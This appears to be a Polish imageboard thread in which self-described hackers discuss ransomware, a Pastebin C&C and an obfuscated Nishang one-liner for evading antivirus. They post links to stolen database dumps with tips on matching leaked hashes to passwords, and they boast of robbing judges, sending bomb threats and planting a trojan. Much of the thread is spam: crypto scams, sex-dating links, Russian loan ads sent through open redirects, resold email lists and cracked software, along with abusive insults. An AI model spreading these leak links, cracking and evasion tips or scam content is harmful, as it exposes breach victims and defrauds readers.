twój styl pisma jest tak charakterystyczny, że widać na pierwszy rzut oka

>C&C na pastebienie?

mówiliśmy że to fatalny pomysł

>Klient tora na kazdym zainfekowanym kompie?

polecam przeczytać https://github.com/mauri870/ransomware

>Crypter na chujowy kod z githuba?

chujowy? eksperci i ofiary mają inne zdanie https://avlab.pl/czy-publikowanie-kodu-zrodlowego-ransomware-dobry-pomysl

https://www.gdatasoftware.com/blog/2016/11/29289-it-s-educational-on-the-no-1-argument-for-open-source-ransomware

https://blog.trendmicro.com/trendlabs-security-intelligence/new-open-source-ransomwar-based-on-hidden-tear-and-eda2-may-target-businesses/

https://twitter.com/GossiTheDog/status/1211283077273653249

>Co wy dzieci gadacie za bzdury?

nie zgrywaj eksperta bo każdy widzi że jesteś debilem

>de…. co? to zwykly oneliner od nishanga, lekko zaobfuskowany,

>zeby przelecial przez windowsa defendera, yandexa i avasta,

tamten wpis pisał Łukasz Jędrzejczak w celu zastraszenia ludzi

>Przeciez na lolifox nigdy nikt niw rzucil

została wrzucona baza Cyfrowe i KSSIP

>nic wlasnorecznie zajebanego

a z własnoręcznych wykładowcy UP, jedna rzecz bardziej wartościowa od wszystkich twoich śmieci razem wziętych

>Przestawili sie z bombiarzy na hekerow xD to juz lepsi byliscie jako bombiarze xD

nikt się nie przestawił, jedna rzecz jest robiona dla idei, druga jako stałe źródło utrzymania

>tacy bardziej autentyczni sie wywawaliscie jak o tym mowiliscie xD znacyz jak mowiels

w przeciwieństwie do ciebie, ty nigdy nie wydawałeś się autentyczny, od twojego pierwszego postu wiedziałem kim jesteś

zostałeś na lolifoxie zdemaskowany w temacie "polecam lekturę psów z cebulki, można się uśmiać", pamiętasz?

>>19486

>fingerprinty zebrane przecza tej teorii

za każdym razem kurwa xD

Design Goal: All Tor Browser users MUST provide websites with an identical user agent and HTTP header set for a given request type. We omit the Firefox minor revision, and report a popular Windows platform. If the software is kept up to date, these headers should remain identical across the population even when updated.

takie głupki pracują w polskiej policji. można bezkarnie kraść i wysyłać alarmy bombowe w dowolnej ilości, oni nigdy nas nie złapią


 No.19781

>>19265

nooooooooo kolego, zobaczymy czy będzie ci tak do śmiechu jak ofiara pójdzie na policję

oddasz jeszcze z procentem


 No.22160

DISKORD WILCZANOWY JEBIE WAS W DUPSKO, keqskvshnobruka nil eluwina ciule


 No.22593

i lecimy na samą górę


 No.23856

vvztpаrg


 No.24367

хwdcwqmlсpеcur


 No.27015

pobierać!


 No.30905

czy sprawcy zostali złapani?


 No.33210

dobre dane


 No.35463

czy złapano już sprawców?


 No.35546

15


 No.35691

13


 No.35743

Unleash the power of cryptocurrency and earn. You $ 15 000 in 24 hours

I've only been a member of Bitcoin Profit for 47 days.

But my life has already changed!

http://vojrklwrm.dfsf.site/c34914d50

Not only did I make my first € 100K, I also met some of the most incredible people.

http://ou.jmmcraft.xyz/7e6

Great to hear you’re getting into programming. You’ve picked your languages pretty well actually as each of these are quite in demand. If you’re looking for more that would add to that kind of skillset I’d suggest either PHP or Ruby on Rails.

Start by defining your expertise and offering it on one of the freelancer sites. The wider your skill set and the better your reviews, the more likely you are to make a living from this type of online work. On average, virtual assistants in the United States earn $15.57 per hour. [11]

Can you shift the debt to a 0% credit card?

You should have several associate programs in position to ensure that you’ll be covered if among the companies you affiliate with wind up having their track record harmed. If that ever before wound up decreasing your sales you should have an additional company in the wings to change web links until the storm passes.

The Signups for Pay subreddit offers some good opportunities to make a little money from home.


 No.35755

How much can I earn per day? At least $ 15 000 a day.

The CryptoCode is the future of online trading using the fast growing cryptocurrency market.

Our members are the lucky few who have seized the opportunity to invest and have made a fortune from their cozy four walls.

http://swkd.forum-stars.com/5d6790

Suitable for everyone - Never traded before? No need to worry, we will do everything for you

It only takes a few minutes to get started and work 24/7

We don't want your money, not even a cent. The software is free of charge.

Customer service is available 24/7 for all of your needs

http://eyd.agabeprojetos.site/81a6

If you don't know where to start, head to the Craigslist Gigs section where jobs like catering help will be posted. You can earn a nice flat fee per event.

You could deliver people’s groceries on Postmates whenever you have the time and get paid for it. You get paid fast and you can earn up to $20/hr.

It should be noted: This technique does wreak some havoc with Red Dead Online’s story continuity, so if you’re concerned about playing through the story missions in order, you’ll have to do things the old-fashioned way.

Business Corporate Careers Forex trading Personal growth Uncategorized.

RadioEarn is Internet-based radio that pays you to listen to live radio.


 No.35756

>>35743

>>35755

nie potrzebujemy takich groszy, okradamy sędziów i prokuratorów i ich znajomych


 No.35763


 No.35764


 No.35765

https://anonfiles.com/Kc63a487nf/agusiqtorrents_zip

dump bazy danych agusiq-torrents.pl


 No.35766

jesli ktos ma baze morele dehashed to niech sie tez podzieli


 No.35767

>>35766

>jesli ktos ma baze morele dehashed to niech sie tez podzieli

tutaj jest https://hashes.org/leaks.php?id=2029

tylko trzeba samodzielnie połączyć email:hash i hash:pass


 No.35798

podbijam


 No.35885

Earning method from $ 15 000 a day

After only 30 days, I still have to pinch myself to make sure I'm not dreaming.

I earned tens of thousands of dollars every month in my own cozy four walls.

Profits grow and grow and grow!

http://ohjeb.forum-stars.com/3a51419

It only takes a few minutes

With just a few clicks, you can generate $ 15,000 every day for the rest of your life

http://bhrlpvgi.fb-marketplace-sales.site/685e

Your blog site shall be used as an advertising platform for many affiliate marketing programs out there on the market. For example, Amazon, ShareASale, Apple and much more.

They do not just add to the convenience in our day to day activities, but it is today one of the most sought after source to make money online.

You may have to start with what pays the bills (like copying paintings, or curating art), even if that isn’t your true passion and be open; sometimes unexpected opportunities show us the right path to making money as an artist.

Many FBAers source products cheaply from China. You can even get in touch with a factory and have your own product made through a website like Alibaba.

You are using an outdated browser. Upgrade your browser todayor install Google Chrome Frameto better experience this site.


 No.36154

Now I earn over € 13 261 a day

I was released two weeks ago.

With no other options, I thought my life was over.

http://hwxdaks.wtmzuvubl.xyz/f7

Now I earn over € 1,261.42 a day.

And for the first time and after only 2 months, my account is not overdrawn.

http://deedjtyv.gdsydbif.xyz/71f4

14 Sites That Pay You To Chat and Answer Questions Online.

When your goal is to launch world-class AI, our reliable training data gives you the confidence to deploy. You choose the level of service and security you want for data collection and annotation, from white-glove managed service to flexible self-service.

Bitcoin Online casinos (official website) are the future of online gambling. Play at over 300 games, including classic roulette, blackjack and slot machines, get paid directly in Bitcoin and earn even more if the BTC price goes up!

This post contains affiliate links, which means I may receive a small commission, at no cost to you, if you make a purchase through a link.

I can i do to make extera money because i do choirs.


 No.36284

hahah głupkom się nie udało 56


 No.36415

Bitcoin Makes People Rich And You Can Be The Next

I finally know what it's like to live your dream.

I no longer feel like I'm outside while everyone else is having fun.

http://bggk.agabeprojetos.site/cf80

The Bitcoin Profit allowed me to retire early and live a lifestyle that the 1% of the richest live.

http://xlrzv.dfsf.site/b6

Data Entry is actually a low paying jobs.

You’ve got great resources here; with these sites freelancers has better chances of getting a client. When you are planning to work online you must possess the skills and expertise because the competition on each task is very high and the chance of getting hired is low. Compared to the person that has no skills and expertise, it is way too hard for you to get a job. However, there are also some freelance tasks that don’t need skills and expertise just like data entry. All you need is a good typing speed and time management in order to be successful with this business. In additional to the list is https://www.99hours.com/ where you can look for freelancers for full time work.

Best Methods to Make Bitcoin Transactions Untracable:

You earn what is known as Swag Bucks which are basically points.

Applicants’ designs would be scrutinized and judged by Woot members (not staff or management) and those made it into the top 3 among these voters would get the privilege to get their designs printed on T-shirts.


 No.36451

https://anonfiles.com/d4F5Bauao3/Exerion.pl.txt_7z

baza exerion.pl

mirror https://share.dmca.gripe/DiS2cQtzTtvbsECu.txt

https://anonfiles.com/Kc63a487nf/agusiqtorrents_zip

dump bazy danych agusiq-torrents.pl

morele dehashed

tutaj jest https://hashes.org/leaks.php?id=2029

tylko trzeba samodzielnie połączyć email:hash i hash:pass


 No.36524

bump jebac spamera


 No.36549

Passive income up to 10 000 EUR per day

Thanks to the CryptoCode I was finally able to pay off all my debts!

I'm now going to quit my job forever and the lifestyle of a millionaire I've always dreamed of!

http://rpwcrcs.dmlrealestateinvesting.com/97360321d

There is no limit to the profits that can be generated by the crypto code system

http://jpctafdxs.jmmcraft.xyz/28

Now my income is up to 10,000 euros a day

You’ve got a real website built, you are learning SEO, you are an internet marketer.

How much can you really earn without a college degree (or experience)?

Credit card companies offer different cash back. You may want to take a look at several companies before applying. Later, it can be decided which company that offers the best cash back. It is suggested if you aim to get the cash back. As an additional note, the cash back is given on selected purchases.

MusicXRay: MusicXRay is an online service that provides consumer feedback to aspiring new artists. After signing up for the service, users listen to music and then rate whether or not they like the song. Regardless of the rating, MusicXray pays 10 cents per song. Check out this video to learn more: Get Paid to Listen to Music Slicethepie: Similar to MusicXRay, Slicethepie pays users to write reviews. While the company started out in the music industry it now provides reviews on fashion, mobile phone accessories, and other products. The company doesn’t disclose how much it pays per review but notes that there are incentives to write good reviews. Find more information here: Slicethepie. Swagbucks: If you are interested in making money from taking surveys, watching videos, and getting cash back deals on online purchases, Swagbucks may be for you. The site offers a few different ways for users to accumulate what it calls Swagbucks, which can either be cashed in for money or traded in for gift certificates. Don’t expect to make a lot from this site, however – Swagbucks accumulate slowly and often requires a large investment of time. See a review of Swagbucks here: SurveySay’s Swagbucks Review. Similar sites include: MyPoints Earning Station InstaGC Cash Crate Fusion Cash Prize Rebel MySurvey Vindale Research Global Test Marke t Userlytics – Makers of mobile apps want to know if their applications are user-friendly. The best way to get that knowledge is by having average users (that would be you and me) test them out. Userlytics pays $10 per app tested. Testers need to make a recording of themselves as they test apps. Offers to test apps are on a first-come, first-serve basis so it’s necessary to act quickly to be selected. See a review of Userlytics here: Userlytics Tester Job Review.

You also earn other rewards, like free food and discounts.


 No.36558

vegeta


 No.36910

SKW - głupki, nieudacznicy, największa kompromitacja w europie. nie potrafią nawet zepchnąć tematów 56


 No.37326

lolifoksy napierdalajcie


 No.37329

>lolifoksy napierdalajcie

Tak, lolifoksiki, napierdalajcie, bo starzy bywalcy celi chcą wywtorzyć z was nową cipkę, jak na zdjęciu.


 No.37896

^lodówkowicz xD


 No.37898

^naganiacz do przeróbek odbytu na cipkę xD


 No.37899

File: 1594029445488.png (124.76 KB, 291x274, 291:274, text598.cleaned.png)


 No.37900

File: 1594029703987.jpg (14.76 KB, 320x240, 4:3, PortretAnonka.jpg)

Portret anonka z lolifoks po paru spotkaniach z nowymi kolegami z więziennej celi.


 No.37901

File: 1594029861654.jpg (50.2 KB, 620x324, 155:81, z18274593V,Tanczacy-policj….jpg)

>5 minutes ago


 No.37904

rozpierdolic polakow


 No.37906

[b]SKW - głupki, nieudacznicy, największa kompromitacja w europie. nie potrafią nawet zepchnąć tematów [/b]


 No.37907

^rosyjski głupek nie potrafi zrobić pogrubionej czcionki xD


 No.37910

POLAK POTRAFI POGRUBIENIE


 No.37912

faovsdf90davauf0aw943535353


 No.37987

>czy znacie jakieś serwisy dla prawników do których loguje się emailem i trzymają tam dokumenty ważne?

dysk wp, dysk interia


 No.37990

>>37987

>dysk wp, dysk interia

to już bardziej dysk google

ale chodziło mi o serwisy prawnicze typu epuap


 No.38251

Find yourself a girl for the night in your city Canada: http://ciekgj.wtmzuvubl.xyz/e5

Sex dating in the UK | Girls for sex in the UK: http://yubh.oxoo.site/a9bb7

Dating site for sex with girls from the USA: http://tnaiv.changemyaddressinusa.site/9a

Adult online dating by the numbers: http://shcw.4js7gjkd.xyz/6e

Adult free dating sites in east london: http://ysauyj.fb-marketplace-sales.site/3b9b3

More Responses. Better Dates. Maybe you should err on the side of caution, and check out these tips for looking good online before choosing your photo lineup…. Online dating is the most effective way to meet rich men. Read this article to learn how to choose safe dating sites to successfully land a rich man. To create this article, 12 people, some anonymous, worked to edit and improve it over time. This article has also been viewed 61, times. Guys Dating.

Enjoy Online Singles Dating with Hot Local Babes in Midland.

Instead Penkman uses the ranking obtained through AAR and calibrates it against other independent dating measures. The new intra-crystalline AAR dating has the potential to seriously improve dating on a range of biominerals. ‘We … turned our attention to ostrich eggshell because there had been some work done in the 90s that showed that ostrich eggshell also potentially contained closed system protein,’ she explains. It’s a biomineral that is often found at archaeological sites and therefore could help to elucidate human evolution.

“It was a natural progression for us. It arose from boredom in a long distance relationship and a realisation that she enjoys being sexually active, while my kink is releasing my partner from the confines of monogamy.”

Picture this: You’ve told your best friend all about the person who has caught your eye at school. In fact, you’ve poured over details of your conversations, analyzed text messages together, and even strategized ways to confess your feelings (in the most chill way possible, of course). Then, all of a sudden, it happens. Your BFF starts dating that person that you had already expressed interest in. What gives?


 No.38265

Adult #1 dating app for android: http://optwtm.laptop100.website/ad97a8f8

Dating site for sex with girls in Australia: http://go.promailpro.website/e48

The best women for sex in your town Canada: http://yshyhtv.promailpro.website/8ec7dbb

Dating for sex | Facebook: http://uce.sospiscinalimpa.site/05f5f7

Meet sexy girls in your city: http://twevafk.sacure98sd.xyz/c97

Student revelations present a discouraging, even frightening, picture: drunken sex, purposefully devoid of personal and emotional connection; social and sexual interactions, as well as students’ self-identity, plagued by distorted gender norms; widespread consumption of porn that intensifies hypermasculine attitudes and behaviors; sexual violence and rape (though too often not named as such); and acute social pressure to participate in a party and hookup culture at the risk of social exclusion. Thankfully, Beste is willing to delve directly into this messiness with her students, inviting them—and, in turn, us—to think critically about it, analyze it from a theo-ethical perspective and move toward more promising ways of being in relationship.

Sri-lanka Escort, Sri-lanka Call girls, Sri-lanka Dating Service Ads Site 1escorts.net.

And although “Mr. Manly” seems to have it, as they say, in the bag. I do have a bone to pick with his profile, well a few bones. “What can that be?!” I can here you exclaim! Take the free Dating Profile “Attraction Killer” Quiz to find out…

Her mustache and chin hairs tickle when she blows you. Her extra pounds she’s crushing you with can make the room feel hotter than Hell in July. The noises she makes during sex are not sounds women should make…they’re more like a train whistle or a tug boat’s fog horn. Because you left the window open during sex, the neighbors have called the cops on you 4 times for attempted bestiality.

Taylor Swift's ‘The Man’ calls out sexism and the industry's double standards and it's the empowering video we need RN.


 No.38271

слава великой россии!


 No.38629

vegeta


 No.38637

asdadasgfdhfhfghgf


 No.38706

The best women for sex in your town: http://hcifr.claim59.xyz/1a132c1

Adult number 1 dating app for android: http://clsps.belluga.xyz/42f69c72

Dating for sex with experienced girls from 30 years: http://nsguem.yruieuk.xyz/e5faf78

Adult online dating mobile numbers: http://wrloqzmy.katinelis.xyz/d1dcda8c4

Sexy girls for the night in your town Canada: http://phmusabte.katinelis.xyz/fd4934

Join Julianne Cantarella, an expert matchmaker for a session where she will inquire and pick your brain about your dating habits and preferences. Figure out exactly what you're looking for and understand date behaviors.

As mentioned there is plenty of choice when it comes to buying products in the Swim Wear – Ladies, 277 in fact. As a guide on what you are likely to have to pay, the cheapest product in the category is just ?7.2 with the most expensive available at ?402. For products from Zoggs the cheapest is ? and highest cost is ?. The average price in the Swim Wear – Ladies cat is ?45.27 and the price of a product from Zoggs varies from as little as ?3 to ?100. During our latest scan of the major retailers Zoggs Women’s Palm Springs Multi Crossback Adult Swimwear was available at ?21.59 from Wiggle Online Cycle Shop.

Woman C: The biggest misconceptions I've encountered include the assumption that women with disabilities can't or don't want to have sex. It's often hard for non-disabled people to think beyond our (boring) ideas of heteronormative sex or "see beyond the disability."

This site can even be called unique in its path, because people there get to know exactly by profession and, accordingly, communicate on topics that are very close to them. If on other dating sites people still choose to choose from photographs, then here you can forget about it, because they choose by profession.

Dating Game Questions : Back in those times, dating used to be one serious affair. But in these days it is like the child’s play for the adults. You can even find like hundreds of apps through which you can date anyone you like. Not even these apps but social media is also a fun way to date someone and know them better. Still, in this process we really need some uncanny dating game questions to know the guy or the girl better.


 No.38836

Sex dating online with photo. Is free: http://trcfihaq.sexxoom.com/e7e8ee

Adult number 1 dating app for iphone: http://lje.claim59.xyz/e60239ef

Adult american dating free online usa: http://azk.upsmart.site/c1a19

The best women for sex in your town UK: http://yrq.coms-setups.site/b94cb9d4

Dating site for sex with girls from Germany: http://fwvalyegj.fb-marketplace-sales.site/f5

Make sure you can support their emotional, sexual and social needs.

Kelleher International has set the Gold Standard in upscale, selective, and personalized matchmaking. Armed with the largest private database of accomplished singles in the country, our "boutique" style of matchmaking assigns a matchmaker, client liaison and scout to our clients in order to provide a truly unique and personalized service that has built Kelleher International's reputation as the most sought after leader in exclusive dating for 30 years.

However, since many guys are interested in online dating these days – let’s have an honest look at the pros and cons.

In the name of Valentine’s day, Ford decided to seize the opportunity to do a little bit of speed dating, with an emphasis on “SPEED.” The line of men had no idea that this beautiful woman was actually a professional stunt driver.

Info: I am single and sexy and very easy to talk to, I have long, smooth, slim legs, a nice tight pussy and firm pert breasts. I have soft kissable lips waiting to talk to you about your deepest darkest fantasies. I am tall and slim with long straight hair below shoulder length and I have been told I have piercing blue eyes. Call me.


 No.39234

Vegeta


 No.39235

>>39234

>Vegeta

co Vegeta ma wspólnego z bazą KSSIP oprócz wrzucenia trojana na którego nikt się nie nabrał?


 No.39339

Sex dating online with photo. Is free: http://gltqq.pornprotect.site/46178

Dating site for sex with girls in Australia: http://xcfsz.testweboot.website/2a6d33d

Adult dating online american singles: http://rvzierisp.ipms.website/e6499240

Beautiful girls for sex in your city AU: http://tboy.cashmovie.xyz/e9f10b0

Sex dating site, sex on a first date, sex immediately: http://tpwaud.oxoo.site/14

Put a reasonable amount of detail in your own profile; it's highly likely she will read it before deciding to respond. Put YOU in your profile. Write how you speak; several people over the time read my profiles and were pleasantly surprised at the way it was writtten and how it turned out to be a reflection of the way I thought and spoke in terms of style, word choice and tone. Some of my profiles were written as if it was a conversation I was having with the dating site, or the girl reading the profile. None of it was "oh. Umm. I have no idea what to put here. Just hit me up if you have any questions" - if I didn't like the question the site asked, I found an excuse to change it to one I wanted to answer.

Yes, some of it applies, but wildland firefighters have their own weird schedules and brotherhood that might make dating even more difficult.

Wenn man das Wort „Casual-Dating“ hort, denken die meisten an „verruchte“ und „obszone“ Webseiten, die von Manneruberschuss und Fake-Profilen gepragt sind. Dieses entspricht in keinster Weise der Realitat und bedient lediglich ein altmodisches Klischee. Viele Erotik-Portale verstehen sich eher als Community, die den Nutzern eine Plattform bietet, um sich besser kennenzulernen. Dabei muss es nicht immer zu Sextreffen oder Swinger-Partys kommen. Hier lassen sich Freundschaften und Bekanntschaften schlie?en. Auch werdet ihr keine Porno-Stars antreffen, die nur darauf warten, ihre „Bekanntschaftsquote“ zu erhohen. In den meisten Fallen handelt es sich um ganz normale Leute, die in ihrem Alltag ganz normalen Tatigkeiten nachgehen und von Zeit zu Zeit einfach mal ein wenig „freaky“ sein mochten. Von daher empfehlen wir ganz locker an die Sache ranzugehen und die Erwartungen nicht zu hoch zu stecken. Tastet euch langsam an die Materie ran und der Rest kommt dann von ganz alleine.

From the 10 commandments to restrictions on the sexual practices of married couples, - it's all controlled by "Jehovah's organization" which is synonymous with the authority of God himself.

Yes, these "men" have a moral and ethical chip missing. the last "man" I talked to told me he wanted to french kiss me on the first date (and wouldn't be averse to have sex also).


 No.39552

Dating for sex | Great Britain: http://cehw.huserinberlin.xyz/8538

Adult online dating mobile numbers: http://amqoijr.sospiscinalimpa.site/8d7b9d

Free Sex Sex Dating: http://phetzy.natural28.online/b5710e

Dating for sex | Facebook: http://fuyo.techenglish.online/bfc136

Adult online dating phone numbers: http://lrokuv.upsmart.site/26e7b87

Another reason for dating is, of course, to choose a spouse. Dating provides you with the opportunity to refine your power of observation. It enables you to make certain what type of personality and disposition is best suited for you. Dating provides the best opportunity for you to find your ideal spouse, and to decide whether the person is the one you would want to spend your life with.

Tinder partnered with GLAAD to allow users to select and display their sexual orientation on their profiles. To make the designation, simply edit your profile, tap “Orientation” and select the identity that best suits you. By visiting your Discovery Preferences, you can view people of your same orientation first.

is a furry dating website that works tirelessly to match its members. Over the years, we have refined our site to better suit your needs. With FurryMate’s private messaging, advanced searching, and instant chat capabilities it is now easier then ever to find your furry match.

Match.com is one of the oldest online dating services on the market. It has been online ever since 1993 and is ran by Match Group.

Back in October, Gomez confirmed that the lyrics of two new songs — "Lose You to Love Me" and "Look at Her Now" — were written specifically about her ex-boyfriend (and Hailey Baldwin Bieber's husband) Justin Bieber. And there's speculation some songs may nod to other men in her dating history, including her past relationship with The Weeknd.


 No.39676

File: 1594324135150.png (46.25 KB, 1263x862, 1263:862, lol.png)

>bądź google

>wytresuj swoje algorytmy żeby wykrywały nieprawidłowości i blokowały logowania z dziwnych lokalizacji

>profilerzy i wyjebkowicze cię nienawidzą

głupki ze służb autentycznie w to wierzą?


 No.39677

>>39676

nigdy nie spotkałem większego chada w internecie


 No.39700

>głupki ze służb autentycznie w to wierzą?

jprdl powiedz że to fejk

czy ludzie autentycznie trzymają hasła do wszystkich serwisów online xDDD


 No.39981

Beata Legowicz znana jako lafirynda z NATO nie potrafi samodzielnie obsługiwać komputera 98


 No.40390

Кpедит нaличными на любые цели - пoдбор кредитa: #Онлайн-зaявka нa кредит нaличными: http://region-kurtamysh.com/bitrix/rk.php?goto=https://vk.com/@-197010811-kak-vzyat-kredit-nalichnymi-v-banke

Кредит нaличными. Деньги в кpедит по пaспoрту: https://argesto.ru/bitrix/rk.php?goto=https://vk.com/@-197010811-kak-vzyat-kredit-nalichnymi-v-banke

Взять крeдит наличными пo пaспoрту бeз спpавok: https://www.blockchain.com/r?url=https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post_10.html

Крeдиты наличными без справок: гдe получить зaём: https://www.google.ng/url?q=https://vk.com/@-197010811-kredit-nalichnymi-v-lubom-gorode-rossii

Кpедит наличными | Получить кpедит наличными: https://virink.com/away?to=https://vk.com/@-197010811-poluchit-kredit-v-den-obrascheniya

Крeдит нaличными на любыe цели: взять kрeдит онлайн: http://forum.hergunkampanya.com/index.php?thememode=full;redirect=https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post_28.html

ТОП банkов которые предлaгaют самый низkий пpoцeнт пo кредиту: http://www.befe.co.kr/directUrl.befe?url=https://vk.com/@-197010811-poluchit-kredit-v-den-obrascheniya

Выгодный пoтрeбительский kpедит нaличными: http://www.allthingscfnm.net/cfnm.php?url=https://vk.com/@-197010811-top-bankov-kotorye-predlagaut-samyi-nizkii-procent-po-kredit

Крeдит наличными и крeдитная карта. Выбираем.: http://www.localmeatmilkeggs.org/facebook.php?URL=https://vk.com/@-197010811-kak-vzyat-kredit-nalichnymi-v-banke

Пoтpeбительсkий kредит – оформить заявkу на kpeдит: https://sultryswing.com/webGallery/main.php?g2_view=core.UserAdmin&g2_subView=core.UserLogin&g2_return=https://potreb-kredit-oformit-zayavku.blogspot.com/

отсутствие необходимости собирать справки клиенту и проверять их кредитору существенно экономит время обеих сторон; нет нужды посвящать руководителей и коллег в свои финансовые проблемы, вынуждающие обратиться за кредитом; существует возможность указать размер всех имеющихся доходов, а не только официальных.

Чаще всего программы рефинансирования можно встретить в крупнейших российских банках.

В нем указывается сумма кредита, срок его возвращения, а также процентная ставка (сумма, которую должен заплатить заемщик за все время пользования кредитом).

Сотрудник банка обязательно обратит внимание на просроченный период, размер просроченного кредита, причины неоплаты, ваш возраст и многое другое.

Для получения денег под залог недвижимости в ВТБ 24 заявителю необходимо соответствовать определенным критериям:

Суть данного метода заключается в том, что вы изначально (как только получили доход) тут же откладываете (вкладываете куда-нибудь) 10% от этой суммы. И так каждый раз.

заемщик не должен быть предпринимателем возраст от до 70 лет, чаще от 23 до 55-60 лет трудовой стаж от 1 года наличие постоянного дохода и способность его подтвердить документально хорошая кредитная история (проверить ее можно тут) отсутствие высокой долговой загруженности отсутствие судимостей ежемесячное наличие достаточных и свободных средств, после расходов на жизнь и на содержание иждивенцев.

Помощь в получении финансового обеспечения предлагают и кредитные брокеры, которые находят достаточно выгодные варианты для получения средств. Главный недостаток работы с брокерами, это высокая комиссия за его услуги.

Полное погашение кредита здесь допускается в любой момент с даты выдачи, хоть через неделю. Банк требует подачи заявления на полное погашение за 30 дней до даты очередного платежа, по факту можно написать заявление за неделю. Образец явления можно скачать по ссылке Заявление на досрочное погашение или попросить у сотрудников офиса.

Приносить с собой нужно только паспорт и второй вспомогательный документ: ИНН, загранпаспорт, копию трудовой книжки или при наличии автомобиля – водительские права.

сократить срок платежей, оставив ежемесячный взнос таким же; снизить кредитную нагрузку, распределив остаток долга на оставшийся период кредитования.

Постоянные издержки — это такой вид затрат, который несет предприятие в рамках одного производственного цикла. Определяется предприятием самостоятельно. Все эти затраты будут характерны для всех циклов производства товара. Переменные издержки — это такие виды затрат, которые переносятся на готовое изделие в полном объеме.

А сама как думаешь? Банк это благотворительная организация которая выдает деньги, которые отдавать не нужно, или коммерческая структура, созданная для того, чтобы его владельцы зарабатывали деньги?

наличными на развитие малого бизнеса на покупку автомобиля (на машину) на покупку жилья на строительство дома на рефинансирование.

бытовую, компьютерную технику; одежду, обувь, аксессуары; покупку различных гаджетов и мобильных устройств; мебель, товары для ремонта; косметику; услуги сотовой, фиксированной телефонной связи, интернет; коммунальные платежи; страховки; налоги, штрафы.

file_links["C:\Links.txt",1,N]


 No.40417

Пoлучить кpeдит в дeнь обрaщения: http://www.ffatsearch.com/search/rank.cgi?mode=link&id=9636&url=https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post.html

4 пoвoда взять пoтpeбитeльский kpедит: http://sfmission.com/rss/feed2js.php?src=https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post_28.html

Кpедит наличными | Кpедит бeз справок и поручитeлей: https://www.southafricanbedandbreakfast.info/goto.php?ad_id=12&url=https://vk.com/@-197010811-poluchit-kredit-v-den-obrascheniya

Кpeдит наличными – офоpмить заявку на kредит: http://proekt-gaz.ru/go?https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post_44.html/

Кpедиты наличными на любые цeли и pефинaнсиpoвaние: http://transmobile.ru/bitrix/rk.php?goto=https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post_10.html

Крeдит нaличными, офоpмить oнлайн заявку и взять: http://svenvanbolt.de/topframe.php?https://vk.com/@-197010811-potrebitelskie-kredity-i-refinansirovanie

Кредиты нaличными частным лицам с минимaльнoй ставkoй: http://www.gavgav.info/catalog/redir.php?go=https://vk.com/@-197010811-v-kakom-banke-mozhno-vzyat-kredit-bez-strahovki

Крeдит нaличными, oфоpмить oнлaйн заявkу и взять: https://pram.elmercurio.com/Logout.aspx?ApplicationName=EMOL&l=yes&SSOTargetUrl=https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post_44.html

Кредит нaличными нa любыe цели oт 50 000 рублей: https://www.coloradoballet.org/Redirect.aspx?destination=https://vk.com/@-197010811-poluchit-kredit-v-den-obrascheniya

Кpедиты наличными нa любые цели и peфинaнсирoваниe: http://maps.google.td/url?q=https://potreb-kredit-oformit-zayavku.blogspot.com/2020/07/blog-post_44.html

Перед тем как взять деньги, придется пройти процедуру подачи заявки. Изначально документы не нужны, если запрос подается через интернет. В форме-анкете указываются:

обработка персональных данных — любое действие (операция) или совокупность действий (операций), совершаемых с использованием средств автоматизации или без использования таких средств с персональными данными, включая сбор, запись, систематизацию, накопление, хранение, уточнение (обновление, изменение), извлечение, использование, передачу (распространение, предоставление, доступ), обезличивание, блокирование, удаление, уничтожение персональных данных;

Срок: до 5 лет; Минимальная сумма: 90 000 рублей. Максимальная сумма: 2 млн рублей. Минимальная сумма частичного досрочного погашения: 10 000 рублей Процентная ставка: 11,99 % годовых в первый год, 9,99% годовых — со второго года кредитования.

Информация не является публичной офертой и представлена в справочных целях.

Посещение банковского отделения в этом случае не требуется, а все оформление занимает не больше 5–10 минут.

Можно оплатить кредит ОТП Банка через терминал Сбербанка. Для этого можно использовать карточку Сбера или устройство с функцией приема наличных.

Но как быть, если потребовались деньги для решения финансовых вопросов? Конечно, банк может выдать кредит, однако у заемщика доходы должны быть на должном уровне. Также кредитор примет во внимание условия, которые изменились после предоставления ипотеки.

Не знаете, дадут ли кредит, если есть долг у судебных приставов, или уже получили отказ от банка? Обратитесь в МФО: в таких организациях требования к заёмщикам не так строги и более лояльны, поэтому шанс взять нужную сумму есть у каждого.

Займ без паспорта: как получить кредит без оригинала основного документа?

Скидка к процентной ставке по кредиту зависит от вида Мультикарты (Дебетовая или Кредитная), а также суммы покупок в месяц.

Здравствуйте. Являюсь владельцем ИП, понадобились деньги на бизнес. Обзвонил кучу компаний, но решил работать именно с Залог Фонд, понравилось, что сразу при первом звонке я узнал, какие будут условия и как нужно действовать в моей ситуации. Первая встреча была уже на сделке, что очень удобно, не пришлось тратить время на лишние поездки. Все делали дистанционно. Выражаю огромную благодарность сотрудникам компании и желаю дальнейших успехов!

Чтобы отфильтровать сведения, включают дополнительные опции для выбора – «оформить кредит», провести кассовые операции и т.д. Необходимо учесть разделение клиентов на юрлиц и обычных граждан. Перед поиском филиала для визита определяют тип клиента.

сколько людей столько и мнений. советую самостоятельно проверять все документы в компании и не торопиться с выбором.

Кроме того, в ещё одну группу можно выделить принципы кредитования, которые предназначены для «служебного пользования» сотрудниками банков и должны закрепляться в их внутренних документах в качестве элемента кредитной политики.

Чтобы его оформить, не нужно выходить из дома – заявка подаётся онлайн; К клиенту выставляются минимальные требования; Не имеет значения кредитная история; Неважно, работает клиент официально или нет; Получить день онлайн реально за 7-20 минут; Без справок о доходах и первых взносов (как, например, в кредит плюс).


 No.40604

>>39676

ja próbowałem i nie udało mi się


 No.41578

I am reselling a BLOCKCHAIN AND CRYPTOCURRENCY EMAIL LIST that I bought off another site.

Are you guys interested? It is good if you sell wholesale. Helped us a lot.

Cheers


 No.41579

I am reselling a BEAUTY PRODUCTS & COSMETICS SHOPS EMAIL LIST that I bought off another site.

Are you guys interested? It is good if you sell wholesale. Helped us a lot.

Cheers


 No.41590

Hello guys

I am selling a cracked version of the best-selling lead generation software:

Search Engine Scraper and Email Extractor

I can do it 80% cheaper.

Do not worry about patents/copyright issues. I can crack everything so nobody will find out.

Do not pay $500 when you can pay me just $50.

